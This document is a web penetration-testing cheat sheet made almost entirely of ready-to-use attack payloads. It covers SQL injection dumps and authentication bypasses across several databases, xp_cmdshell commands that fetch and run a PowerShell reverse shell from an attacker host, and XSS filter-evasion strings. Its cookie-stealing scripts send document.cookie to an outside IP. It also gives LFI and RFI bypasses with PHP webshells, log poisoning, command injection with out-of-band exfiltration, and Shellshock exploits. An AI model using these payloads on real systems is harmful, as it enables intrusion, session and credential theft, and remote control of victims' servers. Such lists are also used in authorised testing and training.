-> Bypass Authentication
' or 1=1 -- -
admin' -- -
' or 1=1 order by 2 -- -
' or 1=1 order by 1 desc -- -
' or 1=1 limit 1,1 -- -
-> get number columns
-1 order by 3;#
-> get version
-1 union select 1,2,version();#
-> get database name
-1 union select 1,2,database();#
-> get table name
-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema="<database_name>";#
-> get column name
-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema="<database_name>" and table_name="<table_name>";#
-> dump
-1 union select 1,2, group_concat(<column_names>) from <database_name>.<table_name>;#
-> view web server path
LOAD_FILE('/etc/httpd/conf/httpd.conf')
-> creating webshell
select "<?php system($_GET['cmd']);?>" into outfile "/var/www/html/shell.php";
e.g.
SELECT LOAD_FILE('/etc/passwd')
-> Bypass Authentication
' or 1=1--
-> get number columns
' order by 3--
-> get table name
' union select null,table_name,null from all_tables--
-> get column name
' union select null,column_name,null from all_tab_columns where table_name='<table_name>'--
-> dump
' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--
-> extracting table names, not displaying standard sqlite tables
http://site.com/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
-> extracting table users
http://site.com/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--
-> Reference
https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf
-> Bypass Authentication
' or 1=1--
-> get version+delay
' SELECT @@version; WAITFOR DELAY '00:00:10'; —
-> Enable xp_cmdshell
' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
-> RCE
' exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<ip>/InvokePowerShellTcp.ps1')" ;--
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
-> edit Invoke-PowerShellTcp.ps1, adding this:
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
impacket-mssqlclient <user>@<ip> -db <database>
xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://<ip>/Invoke-PowerShellTcp.ps1\")
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
1-> Identify the language and frameworks used
2-> Identify entry points (parameters, inputs, responses reflecting values you can control, etc)
3-> Check how this is reflected in the response via source code preview or browser developer tools
4-> Check the allowed special characters
< > ' " { } ;
5-> Detect if there are filters or blockages and modify as needed to make it work
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/xss_bypass.txt https://gist.githubusercontent.com/rvrsh3ll/09a8b933291f9f98e8ec/raw/535cd1a9cefb221dd9de6965e87ca8a9eb5dc320/xxsfilterbypass.lst https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/XSS/XSS-Bypass-Strings-BruteLogic.txt https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/XSS/XSS-Cheat-Sheet-PortSwigger.txt
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
https://www.chromium.org/developers/design-documents/xss-auditor/
https://portswigger.net/daily-swig/xss-protection-disappears-from-microsoft-edge
https://developer.mozilla.org/pt-BR/docs/Web/HTTP/Headers/X-XSS-Protection
https://rapid7.com/blog/post/2012/02/21/metasploit-javascript-keylogger/ https://github.com/hadynz/xss-keylogger
http://www.businessinfo.co.uk/labs/mxss/
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
-> Filter blocking on - Bypass
(on\w+\s*=)
<svg onload%09=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload%0B=alert(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>eval("\u0061lert(1)")</script>
<script>eval("\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029")</script>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
-> String.fromCharCode()
-> unescape
e.g.
-> decode URI + unescape method (need eval)
decodeURI(/alert(%22xss%22)/.source)
decodeURIComponent(/alert(%22xss%22)/.source)
-> unicode
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)"/>
Add execution sink:
-> eval
-> setInterval
-> setTimeout
-> octal
<img src=x onerror="eval('\141lert(1)')"/>
-> hexadecimal
<img src=x onerror="setInterval('\x61lert(1)')"/>
-> mix (uni, hex, octa)
<img src=x onerror="setTimeout('\x61\154\145\x72\164\x28\x31\x29')"/>
https://checkserp.com/encode/unicode/
http://www.unit-conversion.info/texttools/octal/
http://www.unit-conversion.info/texttools/hexadecimal/
<div>here</div>
->
<svg/onload=alert(1)
<input value="here"/></input>
->
" /><script>alert(1)</script>
<script>
var name="here";
</script>
->
";alert(1);//
<button onclick="here;">Okay!</button>
->
alert(1)
<script>var ok = location.search.replace("?ok=", "");domE1.innerHTML = "<a href=\'"+ok+"\'>ok</a>";</script>
->
javascript:alert(1)
-> jjencode
https://utf-8.jp/public/jjencode.html
-> aaencode
https://utf-8.jp/public/aaencode.html
-> jsfuck
http://www.jsfuck.com/
-> Xchars.js
https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
-> Examples
<script>new Image().src="http://<IP>/ok.jpg?output="+document.cookie;</script>
<script type="text/javascript">document.location="http://<IP>/?cookie="+document.cookie;</script>
<script>window.location="http://<IP>/?cookie="+document.cookie;</script>
<script>document.location="http://<IP>/?cookie="+document.cookie;</script>
<script>fetch('http://<IP>/?cookie=' + btoa(document.cookie));</script>
https://raw.githubusercontent.com/esetal/nuclei-bb-templates/master/xss-fuzz.yaml
git-dumper http://site.com/.git .
https://github.com/arthaud/git-dumper
https://github.com/internetwache/GitTools
- Search listing of Id's in requests and in case you don't find create at least two accounts and analysis requests involving ID's
- Identify access controls in the application
- Change the request method (GET, POST, PUT, DELETE, PATCH…)
- search old versions of API's /api/v1/ /api/v2/ /api/v3/
- Try sending a (*) instead of the ID, especially at search points
- Brute-force IDs depending on context and predictability
GET /api/v1/messages?id=<Another_User_ID> # unauthourized
GET /api/v1/messages?id=<You_User_ID>&id=<Another_User_ID> # authorized
GET /api/v1/messages?id[]=<Your_User_ID>&id[]=<Another_User_ID>
POST /api/v1/messages
{"user_id":<You_user_id>,"user_id":<Anoher_User_id>}
-> with a JSON Object
POST /api/v1/messages
{"user_id":{"user_id":<Anoher_User_id>}}
-> with array
{"user_id":001} #Unauthorized
{"user_id":[001]} #Authorized
GET /admin/profile #Unauthorized GET /ADMIN/profile #Authorized
https://caon.io/docs/exploitation/other/uuid/ https://github.com/felipecaon/uuidv1gen
-> add .json if in ruby
/user/1029 # Unauthorized
/user/1029.json # Authorized
git-dumper http://site.com/.git .
https://github.com/arthaud/git-dumper
https://github.com/internetwache/GitTools
$language = str_replace('../', '', $_GET['file']);
/....//....//....//....//etc/passwd
..././..././..././..././etc/paswd
....\/....\/....\/....\/etc/passwd
-> urlencode and Double urlencode /etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
expect://id
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
-> Predefined Paths
preg_match('/^./okay/.+$/', $_GET['file'])
./okay/../../../../etc/passwd
https://site.com/index.php?file=/etc/passwd%00.php
-> Removing .php
https://site.com/index.php?file=index.p.phphp
-> gif
echo 'GIF8<?php system($_GET["cmd"]); ?>' > ok.gif
echo '<?php system($_GET["cmd"]); ?>' > ok.php && zip wshell_zip.jpg ok.php
2-
http://ip/index.php?file=zip://./uploads/wshell_zip.jpg%23ok.php&cmd=id
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/wshell_zip.jpg
-> apache
nc ip 80
<?php system($_GET[‘cmd’]); ?>
or
1-
curl -s http://ip/index.php -A '<?php system($_GET[‘cmd’]); ?>'
2-
http://ip/index.php?file=/var/log/apache2/access.log&cmd=id
-> SMTP
telnet ip 23
MAIL FROM: [email protected]
RCPT TO: <?php system($_GET[‘cmd’]); ?>
http://ip/index.php?file=/var/mail/mail.log&cmd=id
-> SSH
ssh \'<?php system($_GET['cmd']);?>'@ip
http://ip/index.php?file=/var/log/auth.log&cmd=id
-> PHP session
http://ip/index.php?file=<?php system($_GET["cmd"]);?>
http://ip/index.php?file=/var/lib/php/sessions/sess_<your_session>&cmd=id
-> Other Paths
/var/log/nginx/access.log
/var/log/sshd.log
/var/log/vsftpd.log
/proc/self/fd/0-50
https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/fuzzing/linux-lfi-fuzzing.yaml https://raw.githubusercontent.com/CharanRayudu/Custom-Nuclei-Templates/main/dir-traversal.yaml
-> burp-parameter-names.txt - Wordlist for parameter fuzzing
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt
-> Wordlist LFI - Linux
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
-> Wordlist LFI - Windows
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
-> bypass_lfi.txt
https://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/blob/main/wordlists/lfi_bypass.txt
-> poisoning.txt
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/posoning.txt
echo "<?php echo shell_exec($_GET['cmd']); ?>" > evil.txt
python -m http.server 80
http://site.com/menu.php?file=http://<IP>/evil.php%00.png
echo '<?php echo shell_exec($_GET["cmd"]); ?>' > evil.txt
python -m http.server 80
http://site.com/menu.php?file=http://<IP>/evil.txt&cmd=ipconfig
-> Special Characters
& command
&& command
; command
command %0A command
| command
|| command
`command`
$(command)
-> Out Of Band - OOB Exploitation
curl http://$(whoami).site.com/
curl http://`whoami`.site.com/
nslookup `whoami`.attacker-server.com &
curl http://192.168.0.20/$(whoami)
-> Check if the commands are executed by PowerShell or CMD
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
-> Detection
nikto -h <IP> -C all
-> Exploit
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -c 'whoami'" <IP>
curl -A "() { :; };echo ;/bin/bash -c 'hostname'" <IP>
curl -A "() { :; }; /usr/bin/nslookup $(whoami).site.com" <IP>
-> Connect to WebDAV server and send malicious file to shell
cadaver http://<IP>/webdav
put <shell.asp>
curl -u "<user>:<password>" http://<IP>/webdav/shell.asp